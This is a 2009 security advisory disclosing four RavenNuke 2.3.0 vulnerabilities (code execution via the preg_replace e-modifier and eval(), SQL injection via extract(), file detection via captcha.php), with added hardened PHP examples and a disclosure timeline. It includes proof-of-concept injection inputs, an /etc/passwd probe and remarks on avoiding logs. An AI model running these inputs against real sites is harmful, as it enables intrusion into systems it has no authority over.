
Multiple Vulnerabilities in RavenNuke 2.3.0






[waraxe-2009-SA#072] - Multiple Vulnerabilities in RavenNuke 2.3.0
================================================================================

Author: Janek Vind "waraxe"
Date: 16. February 2009
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-72.html


Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

RavenNuke is a web-based automated news publishing and content management
system based on PHP and MySQL. The system is fully controlled using a web-based
graphical user interface (GUI). RavenNuke is an extensively changed fork of
the phpNuke portal system.

http://ravenphpscripts.com/


List of found vulnerabilities
================================================================================

1. Remote Php Code Execution in "avatarlist.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Security risk: High

Reasons:
  1. uninitialized arrays "patterns" and "replacements"
Preconditions:
  1. attacker must be logged in as user
Comments:
  1. Exploit is using "preg_replace" e-modifier
  2. "register_globals" setting does not matter
  3. Sentinel will not stop this exploit
  4. POST method will leave clean logs in most real-world cases

Test using GET method:

http://localhost/ravennuke230/modules.php?name=Your_Account&op=avatarlist
&avatarcategory=gallery&patterns[6]=/a/e&replacements[6]=phpinfo()

Test using POST method:
------------------------------------------------------------

action="http://localhost/ravennuke230/modules.php?name=Your_Account&op=avatarlist" method="post">

------------------------------------------------------------

Fragment of vulnerable source code:
------------------------------------------------------------
$patterns[0] = '/\.gif/';
$patterns[1] = '/\.png/';
...
$replacements[1] = '';
$replacements[0] = '';
...
$entryname = preg_replace($patterns, $replacements, $entry);
------------------------------------------------------------

Solution: initialize arrays before use.


2. Remote Php Code Execution in "Your Account" module
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Security risk: medium

Reasons:
  1. insecure use of "eval()" php function
Preconditions:
  1. Attacker must have admin rights for "Your Account" in
     order to change custom fields
Comments:
  1. This is a privilege escalation vulnerability

Test:

1. log in as admin and go to "Custom Fields" in users administration:

http://localhost/ravennuke230/admin.php?op=yaCustomFields

2. insert "_Z;phpinfo()" (without quotes) into input box "ID Field Name"

3. click "Save fields"

4. now go to "Users":

http://localhost/ravennuke230/admin.php?op=yaUsers

and select "User Details" for any user, click "OK".
Resulting page will display output of the "phpinfo()", done :)

Fragment of vulnerable source code:
-------------------------------------------------------
/* Get Custom Fields and display them in desired order
...
$result = $db->sql_query('SELECT * FROM ' . $user_prefix . '_users_fields
    WHERE need <> "0" AND public="1" ORDER BY pos');
...
while ($sqlvalue = $db->sql_fetchrow($result)) {
    if (substr($sqlvalue['name'], 0, 1) == '_')
        @eval('$name_exit = ' . $sqlvalue['name'] . ';');
-------------------------------------------------------

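The fragment above hands an admin-supplied field name straight to eval() so that names beginning with "_" resolve to language constants. The following is an added example, not RavenNuke's code and not the approach taken in the patched release, of doing that lookup without eval(): the name must match a strict identifier pattern and the constant must exist, otherwise the text is returned as-is. The constants _USERNAME and _EMAIL, the function resolve_field_name() and the sample rows are all constructed for the example.

```php
<?php
// Added example (not RavenNuke's code): resolving a custom-field name that
// starts with "_" as a language constant WITHOUT eval(). The vulnerable
// fragment does @eval('$name_exit = ' . $name . ';'), so a field name such
// as "_Z;phpinfo()" is executed as PHP. Here the name is only ever used as
// a lookup key.

// Constructed stand-ins for RavenNuke language constants.
define('_USERNAME', 'User name');
define('_EMAIL',    'E-mail');

/**
 * Resolve a custom field's display name (constructed helper).
 *
 * Names beginning with "_" are treated as references to language constants.
 * Only a plain identifier can name a constant, so anything containing ";",
 * "(" or whitespace fails the pattern and is returned verbatim as text.
 */
function resolve_field_name($name)
{
    if (substr($name, 0, 1) !== '_') {
        return $name;                       // plain label, no lookup at all
    }
    if (!preg_match('/^_[A-Za-z0-9_]+$/', $name)) {
        return $name;                       // not an identifier: treat as text
    }
    // constant() only runs for names that are defined; no code is evaluated.
    return defined($name) ? constant($name) : $name;
}

// Constructed rows in the shape of the "_users_fields" result set, including
// the payload used in the advisory's test.
$rows = array(
    array('name' => '_USERNAME'),
    array('name' => 'Favourite colour'),
    array('name' => '_Z;phpinfo()'),
    array('name' => '_UNDEFINED'),
);

foreach ($rows as $sqlvalue) {
    $name_exit = resolve_field_name($sqlvalue['name']);
    // Escape on output as well: the label is admin-controlled text.
    echo htmlspecialchars($sqlvalue['name'], ENT_QUOTES) . ' => '
       . htmlspecialchars($name_exit, ENT_QUOTES) . "\n";
}
```

The "_Z;phpinfo()" row never reaches constant(): it fails the identifier check and is printed back as an escaped string, which is the behaviour a defender wants regardless of who holds the admin role.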
3. Sql Injection in "Resend_Email" module
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Security risk: medium

Reasons:
  1. Insecure use of "extract()" php function
Preconditions:
  1. attacker must be logged in as admin

Comments:
  1. This is a privilege escalation vulnerability
  2. POST method will leave clean logs in most real-world cases

Test using POST method:
------------------------------------------------------------

action="http://localhost/ravennuke230/modules.php?name=Resend_Email" method="post">

------------------------------------------------------------

Fragment of vulnerable source code:
------------------------------------------------------------
if (!is_admin($admin)) endit(_ACCESSDENIED);
...
extract($HTTP_POST_VARS);
...
$result = $db->sql_query('select user_id, username, user_email, user_password,
    user_regdate, check_num, time, requestor from '.$user_prefix.'_users_temp');
------------------------------------------------------------

Solution: use EXTR_SKIP to avoid overwriting of existing variables


4. Remote Detection of Local Files in "captcha.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Security risk: low

Reasons:
  1. uninitialized array "aFonts"
Preconditions:
  1. "register_globals=on"
  2. "display_errors=on"
Comments:
  1. multiple page refreshes may be needed because of source code specifics
  2. same method works for remote directories too!

Attacker is able to detect existence of remote files or directories
via different error messages emitted by php.

Test 1:

http://localhost/ravennuke230/images/captcha.php?aFonts[]=/etc/waraxe

Result:

Warning: imageftbbox() [function.imageftbbox]: Invalid font filename in
C:\apache_wwwroot\ravennuke230\includes\class.php-captcha.php on line 298

"Invalid font filename" --> file does not exist

One more possible error message:

Warning: imageftbbox(): Could not find/open font in ...

"Could not find/open font" --> file does not exist


Test 2:

http://localhost/ravennuke230/images/captcha.php?aFonts[]=/etc/passwd

Result:

Warning: imageftbbox() [function.imageftbbox]: Could not read font in
C:\apache_wwwroot\ravennuke230\includes\class.php-captcha.php on line 298

"Could not read font" --> file exists


How to fix:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Upgrade to new version 2.30.01
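Finding 3 above rests on extract() with its default EXTR_OVERWRITE flag, which lets a POST field named like an existing variable (here $user_prefix, later concatenated into SQL) replace it. This is an added example, not RavenNuke's code, showing the same shape of code under the default flag, under the EXTR_SKIP flag the advisory recommends, and with the request read explicitly instead of being extracted at all. The function names, the constructed POST array and the benign value "attacker_chosen" are assumptions made for the example.

```php
<?php
// Added example (not RavenNuke's code): how extract() treats variables that
// already exist, and why EXTR_SKIP closes the hole in finding 3.

// Same shape as the vulnerable module: $user_prefix is set by the
// application, then request fields are imported into the local scope.
function build_query_after_extract($post, $flags)
{
    $user_prefix = 'nuke';                  // application-controlled value
    extract($post, $flags);                 // EXTR_OVERWRITE is the default
    return 'select user_id, username from ' . $user_prefix . '_users_temp';
}

// Hardened alternative: do not import request data into variables at all;
// read the fields the module needs by name and leave everything else alone.
function build_query_explicit($post)
{
    $user_prefix = 'nuke';
    $subject = isset($post['subject']) ? (string) $post['subject'] : '';
    // $subject is used by the module; the table prefix never comes from $post.
    return 'select user_id, username from ' . $user_prefix . '_users_temp';
}

// Constructed POST body: one field whose name collides with an application
// variable (a harmless value is used here to show the overwrite itself).
$post = array(
    'user_prefix' => 'attacker_chosen',
    'subject'     => 'Resend my activation mail',
);

// Default flags: the table name in the SQL now comes from the request.
echo build_query_after_extract($post, EXTR_OVERWRITE), "\n";

// EXTR_SKIP: $user_prefix already exists, so the POST field is ignored and
// only names that do not yet exist ($subject) are created.
echo build_query_after_extract($post, EXTR_SKIP), "\n";

// Explicit reads: no collision is possible, whatever the request contains.
echo build_query_explicit($post), "\n";
```

EXTR_SKIP is the minimal change the advisory asks for; EXTR_PREFIX_ALL (every imported name gets a prefix) or, better, not calling extract() on request data at all removes the collision class entirely, because the set of variables the request can create no longer overlaps with the application's own.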
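Findings 1 and 4 share one root cause: an array is filled element by element without first being created empty, so whatever the global scope already holds under that name (here, request-supplied elements) is merged into it. The following added example, not RavenNuke's code, shows the vulnerable and the initialized form of the avatarlist pattern/replacement arrays, and an initialized font list for the captcha case that never takes a path from the request and does not let GD's warning text reach the client. import_request_array() is a constructed stand-in for however request data reaches the global scope in the application (the advisory notes register_globals does not matter for finding 1, and the real mechanism is not shown here); the font file names are constructed as well.

```php
<?php
// Added example (not RavenNuke's code) for findings 1 and 4.

// Constructed stand-in for the import of request data into global scope.
function import_request_array($request)
{
    foreach ($request as $k => $v) {
        $GLOBALS[$k] = $v;
    }
}

// Finding 1, vulnerable shape: the arrays are assumed empty but never made
// empty, so pre-existing elements (e.g. key 6 from the request) survive and
// are passed to preg_replace() together with the intended ones.
function entry_name_vulnerable($entry)
{
    global $patterns, $replacements;        // stand-in for script-scope arrays
    $patterns[0]     = '/\.gif/';
    $patterns[1]     = '/\.png/';
    $replacements[1] = '';
    $replacements[0] = '';
    return preg_replace($patterns, $replacements, $entry);
}

// Finding 1, hardened shape: local arrays created complete in one place,
// fixed patterns, and no e-modifier anywhere.
function entry_name_fixed($entry)
{
    $patterns     = array('/\.gif$/i', '/\.png$/i');
    $replacements = array('', '');
    return preg_replace($patterns, $replacements, $entry);
}

// Constructed request: a benign extra pattern/replacement pair under key 6
// (the advisory's test uses the same keys with an e-modifier payload).
import_request_array(array(
    'patterns'     => array(6 => '/a/'),
    'replacements' => array(6 => 'X'),
));

echo entry_name_vulnerable('avatar.gif'), "\n";   // request pair is applied
echo entry_name_fixed('avatar.gif'), "\n";        // request pair is ignored

// Finding 4: an uninitialized $aFonts let a request supply arbitrary paths,
// and imageftbbox()'s differing warnings then revealed whether each path
// existed. Hardened: the list is created empty and filled from constants,
// only an index may come from the caller, the path is pinned to one
// directory, and readability is checked so no GD warning is ever raised.
function pick_captcha_font($font_dir, $requested_index = null)
{
    $aFonts   = array();                     // always start from empty
    $aFonts[] = 'captcha1.ttf';              // constructed file names
    $aFonts[] = 'captcha2.ttf';

    $i = ($requested_index !== null && isset($aFonts[(int) $requested_index]))
        ? (int) $requested_index
        : array_rand($aFonts);

    $path = rtrim($font_dir, '/') . '/' . basename($aFonts[$i]);
    if (!is_readable($path)) {
        return false;   // caller falls back; nothing about the path is echoed
    }
    return $path;
}

$font = pick_captcha_font(dirname(__FILE__) . '/fonts', 1);
echo $font === false ? "no usable font\n" : "using $font\n";
```

Two configuration points complete the fix for finding 4 regardless of the code: display_errors=off (with log_errors=on) so that even an unexpected warning is written to the server log rather than the response, and register_globals=off so request parameters cannot become variables at all.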

Disclosure Timeline:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

01/16/09 Developer contacted
01/16/09 Developer's initial response
01/17/09 Findings sent to developer
02/15/09 Patched version 2.30.01 released by developer
02/16/09 Public disclosure


Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to ToXiC, y3dips, Sm0ke, Heintz, slimjim100, pexli, mge, str0ke,
to all active waraxe.us forum members and to anyone else who knows me!


Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe@yahoo.com
Janek Vind "waraxe"

Waraxe forum: http://www.waraxe.us/forums.html
Personal homepage: http://www.janekvind.com/

---------------------- [ EOF ] ------------------------------
